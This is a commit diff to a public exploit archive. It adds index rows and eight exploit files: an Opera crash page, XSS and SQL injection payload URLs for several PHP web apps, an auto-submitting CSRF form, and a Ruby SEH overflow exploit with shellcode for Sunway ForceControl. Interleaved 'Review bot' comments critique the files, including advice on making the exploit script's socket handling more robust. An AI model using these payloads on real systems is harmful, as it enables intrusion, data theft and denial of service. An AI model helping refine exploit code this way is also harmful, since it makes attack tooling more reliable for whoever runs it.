Update: 2015-01-23
8 new exploits
parent
cdb1e00bef
commit
dc7ad96825
9 changed files with 201 additions and 1 deletions
10
files.csv
10
files.csv
|
@ -32192,7 +32192,7 @@ id,file,description,date,author,platform,type,port
|
||||||
35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80
|
35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80
|
||||||
35731,platforms/php/remote/35731.rb,"Pandora v3.1 - Auth Bypass and Arbitrary File Upload Vulnerability",2015-01-08,metasploit,php,remote,80
|
35731,platforms/php/remote/35731.rb,"Pandora v3.1 - Auth Bypass and Arbitrary File Upload Vulnerability",2015-01-08,metasploit,php,remote,80
|
||||||
35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0
|
35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0
|
||||||
35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS",2015-01-09,Dave,php,webapps,80
|
35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS",2015-01-09,Technidev,php,webapps,80
|
||||||
35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0
|
35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0
|
||||||
35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
|
35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
|
||||||
35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0
|
35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0
|
||||||
|
@ -32303,3 +32303,11 @@ id,file,description,date,author,platform,type,port
|
||||||
35853,platforms/php/webapps/35853.php,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1)",2011-06-13,pentesters.ir,php,webapps,0
|
35853,platforms/php/webapps/35853.php,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1)",2011-06-13,pentesters.ir,php,webapps,0
|
||||||
35854,platforms/php/webapps/35854.pl,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (2)",2011-06-13,pentesters.ir,php,webapps,0
|
35854,platforms/php/webapps/35854.pl,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (2)",2011-06-13,pentesters.ir,php,webapps,0
|
||||||
35855,platforms/php/remote/35855.txt,"PHP <= 5.3.6 Security Bypass Vulnerability",2011-06-14,"Krzysztof Kotowicz",php,remote,0
|
35855,platforms/php/remote/35855.txt,"PHP <= 5.3.6 Security Bypass Vulnerability",2011-06-14,"Krzysztof Kotowicz",php,remote,0
|
||||||
|
35856,platforms/multiple/dos/35856.html,"Opera Web Browser 11.11 Denial of Service Vulnerability",2011-06-14,echo,multiple,dos,0
|
||||||
|
35861,platforms/php/webapps/35861.txt,"vBTube 1.2.9 'vBTube.php' Multiple Cross Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps,0
|
||||||
|
35862,platforms/php/webapps/35862.txt,"miniblog 1.0 Multiple Cross Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0
|
||||||
|
35863,platforms/php/webapps/35863.php,"myBloggie 2.1.6 HTML-injection and SQL Injection Vulnerabilities",2011-06-15,"Robin Verton",php,webapps,0
|
||||||
|
35864,platforms/windows/remote/35864.txt,"Sunway ForceControl 6.1 Multiple Heap Based Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",windows,remote,0
|
||||||
|
35865,platforms/php/webapps/35865.txt,"Nibbleblog Multiple SQL Injection Vulnerabilities",2011-06-19,KedAns-Dz,php,webapps,0
|
||||||
|
35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 Cross Site Scripting and SQL Injection Vulnerabilities",2011-06-18,KedAns-Dz,php,webapps,0
|
||||||
|
35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 'sitemap.php' Cross Site Scripting Vulnerability",2011-06-18,Bl4ck.Viper,php,webapps,0
|
||||||
|
|
|
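--- a/platforms/multiple/dos/35856.html
+++ b/platforms/multiple/dos/35856.html
@@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/48262/info
+
+The Opera Web Browser is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+Opera Web Browser 11.11 is vulnerable; other versions may also be affected.
+
+<html>
+<body>
+<iframe src='about:blank' id='bo0om' style="width:0px;height:0px;border:0px none;"></iframe>
+<script type="text/javascript" language="javascript">
+
+/*
+*
+* Opera 11.11 Remote Crash
+* Software link: http://www.opera.com/download/
+* Tested on: Win32 xp home sp 3
+* CVE : null
+*
+* Im too lazy to deep analyze this ,but i thing is just unexploitable crash
+* so f****jixvt
+* ( dla klechis?awa i jego kosiarki :i )
+*
+*/
+
+var a = window.document.getElementById('bo0om');
+var b = a.contentDocument.createElement('font');
+a.src='about:blank';
+setTimeout('b.face = "h3h";',500);
+
+</script>
+</body>
+</html>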
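--- a/platforms/php/webapps/35861.txt
+++ b/platforms/php/webapps/35861.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/48280/info
+
+vBTube is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+vBTube 1.2.9 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cy/vBTube.php?page=1&do=user&uname="><script>alert(1);</script>
+http://www.example.com/forum/vBTube.php?do=view&vidid=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E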
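--- a/platforms/php/webapps/35862.txt
+++ b/platforms/php/webapps/35862.txt
@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/48281/info
+
+miniblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+miniblog 1.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/adm/list.php?post_list=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/adm/login.php?error_text=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/adm/options.php?response_text=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/adm/password.php?response_text=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/adm/edit.php?response_text=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/adm/edit.php?mode=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+
+<form action="http://www.example.com/adm/admin.php?mode=add&id=" method="post">
+<input type="hidden" name="data[post_title]" value="csrf">
+<input type="hidden" name="data[post_content]" value="csrf">
+<input type="hidden" name="data[published]" value="1">
+<input type="hidden" name="miniblog_PostBack" value="Add">
+<input type="submit" id="btn">
+</form>
+<script>
+document.getElementById('btn').click();
+</script>
+
+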
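Review bot: The form and script at the end of the file (`<form action="http://www.example.com/adm/admin.php?mode=add&id=" method="post">` through `</script>`) document what appears to be a forged admin post submission, but neither this file's description nor the files.csv entry (`miniblog 1.0 Multiple Cross Site Scripting Vulnerabilities`) mentions it, so anyone triaging from the index alone would miss that the entry also covers a state-changing request. A heading line before the form in the file's existing style, such as `Cross-site request forgery (adm/admin.php, add post):`, would make the second issue findable. The file also says `miniblog 1.0.0` while the index row says `1.0`; one of the two should be aligned.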
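--- a/platforms/php/webapps/35863.php
+++ b/platforms/php/webapps/35863.php
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/48317/info
+
+myBloggie is prone to a SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
+
+myBloggie 2.1.6 is vulnerable; other versions may also be affected.
+
+<?php
+//trackback.php - Line 33 - 35
+$url=urldecode($_REQUEST['url']);
+if (validate_url($url)==false) { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : URL not valid</p>"); }
+
+?>
+
+
+<?php
+//trackback.php - Line 750
+function validate_url($url) {
+if ( ! preg_match('#^http\\:\\/\\/[a-z0-9\-]+\.([a-z0-9\-]+\.)?[a-z]+#i', $url, $matches) ) {
+return false;
+} else {
+return true;
+}
+}
+?>
+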
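Review bot: The `preg_match('#^http\\:\\/\\/[a-z0-9\-]+\.([a-z0-9\-]+\.)?[a-z]+#i', $url, $matches)` check in `validate_url()` is anchored only at the start, so any value that begins with a plausible host is accepted regardless of what follows, and the caller at `trackback.php` lines 33-35 is shown only up to the `validate_url` call, so how the `urldecode`d value is used after a successful check is not visible in this excerpt. A defensive fix validates the whole value rather than a prefix, for example `filter_var($url, FILTER_VALIDATE_URL)` or an expression anchored with `$` and a restricted character class, and still treats the result as untrusted when it reaches the database or the page, since checking shape is not a substitute for escaping. The unused `$matches` argument could be dropped.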
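--- a/platforms/php/webapps/35865.txt
+++ b/platforms/php/webapps/35865.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/48339/info
+
+Nibbleblog is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Nibbleblog 3.0 is affected; other versions may also be vulnerable.
+
+http://www.example.com/index.php?page=[SQLi]
+http://www.example.com/post.php?idpost=[SQLi]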
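--- a/platforms/php/webapps/35866.txt
+++ b/platforms/php/webapps/35866.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/48341/info
+
+Immophp is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Immophp 1.1.1 is vulnerable; other versions may also be affected.
+
+SQL-injection:
+
+http://www.example.com/index.php?page=-2%20uniuon%20select%201,2,3,version(),5--
+http://www.example.com/annonce_detail.php?annonce=-2%20union%20all%20select%20group_concat(table_name)%20from%20information_schema.tables%20where%
+
+Cross-site scripting:
+
+http://www.example.com/annonce.php?secteur= %3cscript%3ealert%3c'31337'%3e%3b%3c%2fscript%3e
+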
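--- a/platforms/php/webapps/35867.txt
+++ b/platforms/php/webapps/35867.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48342/info
+
+Taha Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Taha Portal 3.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.asp?id=3&serword=%3Cscript%3Ealert%28%22sss%22%29;%3C/script%3E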
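--- a/platforms/windows/remote/35864.txt
+++ b/platforms/windows/remote/35864.txt
@@ -0,0 +1,53 @@
+source: http://www.securityfocus.com/bid/48328/info
+
+Sunway ForceControl is prone to multiple heap-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
+
+Attackers can exploit these issues to execute arbitrary code on the affected device. Failed exploit attempts will result in a denial-of-service condition.
+
+def send(packet)
+begin
+sock = TCPSocket.new(@ip, @port)
+sock.write(packet)
+rescue Exception => e
+return false
+else
+resp = sock.recv(1024)
+sock.close
+
+return true
+end
+end
+
+@ip = ARGV[0]
+@port = 80
+
+# windows/exec CMD=calc.exe
+shellcode = "\xb8\xd5\x45\x06\xc4\xda\xde\xd9\x74\x24\xf4\x5b\x33\xc9" +
+"\xb1\x33\x31\x43\x12\x03\x43\x12\x83\x3e\xb9\xe4\x31\x3c" +
+"\xaa\x60\xb9\xbc\x2b\x13\x33\x59\x1a\x01\x27\x2a\x0f\x95" +
+"\x23\x7e\xbc\x5e\x61\x6a\x37\x12\xae\x9d\xf0\x99\x88\x90" +
+"\x01\x2c\x15\x7e\xc1\x2e\xe9\x7c\x16\x91\xd0\x4f\x6b\xd0" +
+"\x15\xad\x84\x80\xce\xba\x37\x35\x7a\xfe\x8b\x34\xac\x75" +
+"\xb3\x4e\xc9\x49\x40\xe5\xd0\x99\xf9\x72\x9a\x01\x71\xdc" +
+"\x3b\x30\x56\x3e\x07\x7b\xd3\xf5\xf3\x7a\x35\xc4\xfc\x4d" +
+"\x79\x8b\xc2\x62\x74\xd5\x03\x44\x67\xa0\x7f\xb7\x1a\xb3" +
+"\xbb\xca\xc0\x36\x5e\x6c\x82\xe1\xba\x8d\x47\x77\x48\x81" +
+"\x2c\xf3\x16\x85\xb3\xd0\x2c\xb1\x38\xd7\xe2\x30\x7a\xfc" +
+"\x26\x19\xd8\x9d\x7f\xc7\x8f\xa2\x60\xaf\x70\x07\xea\x5d" +
+"\x64\x31\xb1\x0b\x7b\xb3\xcf\x72\x7b\xcb\xcf\xd4\x14\xfa" +
+"\x44\xbb\x63\x03\x8f\xf8\x9c\x49\x92\xa8\x34\x14\x46\xe9" +
+"\x58\xa7\xbc\x2d\x65\x24\x35\xcd\x92\x34\x3c\xc8\xdf\xf2" +
+"\xac\xa0\x70\x97\xd2\x17\x70\xb2\xb0\xf6\xe2\x5e\x19\x9d" +
+"\x82\xc5\x65"
+
+payload = "H" * 1599
+payload << "\xeb\x06\x90\x90" # Pointer to Next SE Handler
+payload << [0x719737FA].pack("V*") # SEH Handler - p/p/r
+payload << "\x90" * 40
+payload << shellcode
+payload << "\x90" * (4058 - shellcode.length)
+
+pack = "GET /#{payload} HTTP/1.1\r\n"
+pack << "Host: http://#{@ip}:#{@port}\r\n\r\n"
+
+puts "packet sended." if send(pack)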
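Review bot: `rescue Exception => e` in `send` catches every exception, including `Interrupt` and `SystemExit`, and `e` is never used; `rescue StandardError` is the narrower form and still covers the `Errno::*` and `SocketError` failures the method is guarding against. The socket is closed only on the success path: if `sock.recv(1024)` in the `else` branch raises, the preceding `rescue` does not apply and `sock` is left open, so the close belongs in an `ensure sock.close if sock` clause. `resp` is assigned and never read, so the `recv` result could be discarded directly. The original file's indentation is not recoverable from this rendering, so the `begin`/`rescue`/`else`/`ensure` structure should be re-indented when it is next touched.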